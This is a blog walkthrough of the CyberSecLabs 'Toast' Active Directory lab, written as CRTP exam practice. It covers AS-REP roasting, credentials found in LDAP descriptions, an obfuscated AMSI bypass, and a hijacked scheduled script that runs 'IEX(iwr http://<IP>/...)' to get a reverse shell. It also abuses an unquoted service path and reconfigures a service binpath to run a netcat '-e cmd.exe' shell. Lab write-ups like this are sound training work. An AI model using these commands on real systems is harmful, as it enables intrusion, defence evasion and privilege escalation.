• @Firestone65

1# CRTP Series | CyberSecLabs : Toast Write-up

Updated: Nov 10, 2021



This is the 1st blog out of a series of blogs I will be publishing on vulnerable machines in preparation for the CRTP exam.

You can access my Gitbook repository here for all the commands.


Let's begin!


Reconnaissance


First we run an nmap scan to see which ports are open and the services running on them.

  • -Pn : Skip host discovery [Don't ping]

  • -p- : Scan all 65535 ports

  • -oA : Save output to file


Let's run an aggressive nmap scan to enumerate the services on all open ports.

  • -A : Enable OS detection, version detection, script scanning, and traceroute


Notes:

  • Looking at ports 389(LDAP) and 88(Kerberos), our target is likely a Domain Controller.

  • Domain Name : Toast.csl | Hostname: TOAST-DC

  • The SMB service stands out from all the services, and that's where we'll start poking.


Enumeration


We have anonymous read access on 2 shares, but nothing useful in there.

Interestingly, we now have 2 usernames:

  • Karen

  • Potato

If we did not know this, we could enumerate valid users using GetNPUsers.py from impacket with a username wordlist from Seclist.


Let's see if any of the users have Kerberos-Pre-authentication disabled. If yes, we could grab the user's crackable AS-REP and brute-force it offline.


Let's take a deeper look at how this attack works.


 

ASREP Roast

  • If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled i.e. Kerberos preauth is disabled, it is possible to grab user's crackable AS-REP and brute-force it offline.

  • With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forced disabled as well.

Workflow

  1. [AS-REQ] Timestamp is encrypted with the NTLM hash of the user and sent to KDC. This is when Pre-Auth is enabled. KDC knows that the request came from the specific user. If disabled, this step can be spoofed.

  2. [AS-REP] KDC creates a TGT which is encrypted. It contains an additional information which is signed with the user's NTLM hash.

  3. Attacker grabs the AS-REP and cracks the user's NTLM hash offline.

 

Using GetNPUsers.py from impacket we were able to identify that user 'Karen' has Kerberos Preauth disabled. The AS-REP is stored in a format readable by john. Crack the NTLM hash with rockyou.txt as the wordlist.

Great, we've owned user Karen!


Remember that LDAP(port 389) was open. Let's manually enumerate LDAP as user Karen.

First we need to identify the naming context. Let's use python3.

Next, let's grab the "Description" for all objects. Why you ask? Administrators are known to save passwords in the "Description" of the object, especially when there are roles requiring double-shifts where different users share passwords. Obviously unaware that they could be accessed by bad-actors


Looks like we've got user Potato's credentials! Let's revisit enumeration of shares with Potato's privileges.

Notes:

  • We have READ/WRITE access on Potato share.

  • ClearLogs.ps1 appears to be running as a cronjob every minute.

  • We could possible replace it's contents to grab a reverse shell onto the target.


Initial Foothold



Notes:

  • The traditional method of gaining a foothold using Invoke-PowershellTcp.ps1 or delivering the payload using SMB do not work. Although we can observe the target's requests to our web-server, we do not get a shell as Defender and AMSI seem to be causing problems.

  • To overcome this, let's use this AMSI bypass. Shout-out to PinkDraconian for this.

  • Additionally we'll need to obfuscate the bypass code using ISESteroids.

Obfuscation of AMSI Bypass


1. To install ISESteroids, run this in Powershell:

Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery -Force

2. Start a Powershell ISE Editor and run:

Start-Steroids

3. Copy the AMSI Bypass code to the editor and obfuscate the code.

4. Save the output as amsibypass.ps1



Download Invoke-PowerShellTcp.ps1 and append to it's end:

Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port No>

Copy both scripts to a folder and host it on a web server.

python -m SimpleHTTPServer

Let's replace ClearLogs.ps1 with the below content:

IEX(iwr http://<IP>/amsibypass.ps1 -UseBasicParsing); 
IEX(iwr http://<IP>/Invoke-PowerShellTcp.ps1 -UseBasicParsing);

Copy it to the Potato Share by logging into SMB:

smbclient \\\\172.31.3.8\\Potato -U "Potato"%"W2CUvphqXB"
put ClearLogs.ps1

The idea is to get the cronjob to download both scripts and execute in memory. Soon enough, we get a callback, followed by a reverse shell!


To get a more stable shell, I downloaded netcat onto the target to create a new shell.

We've got our first flag!



Lateral Movement


To automate the Local Windows Privilege Escalation checklist, download & execute winPEAS on the target. Right away we observe a red flag. There exists a misconfigured service, 'HellEscape', with an Unquoted Service Path. Checking if we have permissions to restart 'HellEscape' using Service Controller Utility(sc), and sure enough we do!

Let's take a deeper look at how this local privilege escalation attack works:


 

Unquoted Service Path Abuse


Services in windows have a binpath(Binary Path) which contains the command the service runs when it starts. If we use the sc utility to display the config of a service, among other information, we have the BINARY_PATH_NAME.

Weird stuff can happen if we do not use quotes in the BINARY_PATH_NAME.


Executables can take arguments, generally separated by spaces or executables can be references by using their absolute paths. Paths can also have spaces in them. Let's understand how windows interprets unquoted service paths:

Prerequisites:

  • Services that have a space in it's path with no quote.

  • Write permissions in the required folder.

Target a service which:

  • We have permissions to restart.

  • Runs with elevated privileges.

In this case, when 'HellEscape' is started, the system tries to interpret the possibilities in the following order:

  1. c:\Program.exe

  2. c:\Program Files\Purgatory\Up.exe

  3. c:\Program Files\Purgatory\Up For.exe and so on..

If an attacker is able to place a malicious executable in one of these unexpected paths, he can elevate privileges to the user running the service.


 

Now that we've got that covered, lets generate a reverse shell payload, rename it to 'Up.exe' and place in the write-able directory: c:\Program Files\Purgatory\Up.exe


Like before, we will need to bypass AMSI using amsibypass.ps1 before running the malicious executable. To make things simple, I've compiled Clearlogs.ps1 into an exe using PS2-EXE.

#Clearlogs.ps1 
IEX(iwr http://<IP>/amsibypass.ps1 -UseBasicParsing); 
IEX(iwr http://<IP>/Invoke-PowerShellTcp.ps1 -UseBasicParsing);

Remember to make necessary port no: changes within Invoke-PowerShellTcp.ps1

Notes:

  • 'HellEscape' runs with privileges of 'Serviceuser'.

  • We have write-permissions in the required directory as well as restart permissions to exploit the Unquoted Service Path misconfiguration.

  • Compile Clearlogs.ps1 into script.exe

  • Transfer it over to the write-able directory as :

c:\Program Files\Purgatory\Up.exe

  • Set up a listener using netcat.

  • Start 'HellEscape' using sc.

As you can see above, I've used netcat again to get a more stable shell. We now have privileges of Serviceuser!



Privilege Escalation


Once again, I've used winPEAS to see what's in store for us as 'Serviceuser'.

We can see that service 'UsoSvc' is affected by a Security misconfiguration vulnerability. We have Full Access on it's binary path and it runs as LocalSystem(Admin privileges). What does this mean? Well, we can re-configure the BIN_PATH_NAME to run any command or any binary of our choosing when 'UsoSvc' is started. Ideal for elevating privileges. For example:

  • Add our user to the Administrator's group :

net localgroup administrators toast\Serviceuser /add
  • Get a reverse shell:

c:\<Directory>\nc.exe <IP> <port no:> -e c:\Windows\system32\cmd.exe

Let's use the reverse shell method to elevate privileges to SYSTEM. We can use sc to modify the binpath and restart the service.

The System Flag is ours.



To Summarize:

  • Valid usernames were enumerated.

  • User Karen had Kerberos-Pre-authentication disabled and a weak password configured. This enabled us to grab the AS-REP and crack the hash offline.

  • User Potato's password was exposed in the object 'Description'

  • The service 'HellEscape' was misconfigured with an Unquoted Service Path, which aided us to laterally obtain Serviceuser's privileges.

  • The service 'UsoSvc' had misconfigured permissions which helped us elevate to LocalSystem.


 

1,218 views0 comments

Recent Posts

See All